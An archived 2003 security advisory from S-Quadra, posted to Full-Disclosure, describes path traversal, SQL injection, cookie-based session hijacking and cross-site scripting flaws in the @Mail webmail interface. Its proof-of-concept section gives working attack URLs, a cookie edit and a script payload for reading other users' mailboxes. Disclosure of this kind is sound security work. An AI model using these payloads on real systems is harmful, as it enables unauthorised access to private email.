lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3FD5B0C5.5060800@s-quadra.com>
Date: Tue, 09 Dec 2003 14:23:49 +0300
From: S-Quadra Security Research <research@...uadra.com>
To: full-disclosure <full-disclosure@...ts.netsys.com>,
   bugtraq <bugtraq@...urityfocus.com>
Subject: @Mail web interface multiple security vulnerabilities


               S-Quadra Advisory #2003-12-09

Topic: @Mail web interface multiple security vulnerabilities
Severity: Average
Vendor URL: http://www.atmail.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031209.txt
Release date: 09 Dec 2003


1. DESCRIPTION

"@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)." -
www.atmail.com site says.

2. DETAILS

Multiple security vulnerabilities has been found in the @Mail web
interface which could allow a remote attacker in the worst case to gain
access to  user's mailbox.

@Mail allows two different types of installation:

a) Flat file install

All profiles and messages of the @Mail users stored in files.
This storage method is recommended for user bases < 10,000 users.

b) SQL database install (MySQL)
User profiles and messages are stored in a SQL database.

-- Vulnerability 1: Flat file install - Input validation error

'showmail.pl' fails to validate 'Folder' request parameter which allows
an attacker to point it to
mailbox of any registered user in @Mail system.

-- Vulnerability 2: SQL database install - Multiple SQL injection
vulnerabilities

Multiple SQL Injection vulnerabilities has been found in @Mail web
interface. User supplied input is not filtered before being used in a
SQL query. Consequently, query modifications is possible. Successfull
exploitaion could allow a remote attacker to read any email messages for
any email address registered in @Mail system.

Affected scripts - 'atmail.pl', 'search.pl', 'reademail.pl'.

-- Vulnerability 3: SQL database install - Session hijacking vulnerability

When user is logs into @Mail through web interface his session id and
mailbox name are saved in a cookie. Modification of mailbox name allows
a attacker to gain access to victim's mailbox.
Victim's session ID must be active for this attack to be successfull.

-- Vulnerability 4: All types of install - Cross Site Scripting
vulnerability in 'showmail.pl'

By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal session id and gain access
to victim's mailbox.

3. PoC Code

-- Vulnerability 1

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

The following url will give access to victim@...ehost.com's mailbox

-http://www.site.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

-- Vulnerability 2

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

- through SQL Injection vulnerability in 'search.pl' an attacker can
find message id for any message of any registered user
- the following url open message with message id '666' for user
'victim@...ail.com'

-http://www.site.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

-- Vulnerability 3

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

1. Attacker logs into @Mail web interface.
2. Attacker changes mailbox name in a cookie to victim's mailbox name:

Account&hacker%40somehost.com&SessionID&1064305709fzvpjackee =>
Account&victim%40somehost.com&SessionID&1064305709fzvpjackee

3. Attacker opens web interface of victim's email box by visiting the
following url
   - http://www.site.com/parse.pl?file=html/english/xp/xplogin.html.

-- Vulnerability 4

Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server

http://www.site.com/showmail.pl?Folder=<script>alert(document.cookie)</script>

4. FIX INFORMATION

S-Quadra alerted @Mail's development team to these issues on 02 Dec
2003. No response has been received. No fix available.

5. CREDITS

Nick Gudov <cipher@...uadra.com> is responsible for discovering
this issue.

6. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assesment, web application security, source code review and
third party product vulnerability assesment, forensic support and
reverse engineering.

Security is an art and our goal is to bring responsible and high quality
security service to the IT market, customized to meet the unique needs
of each individual client.

S-Quadra, (pronounced es quadra), is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.

          S-Quadra Advisory #2003-12-09



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ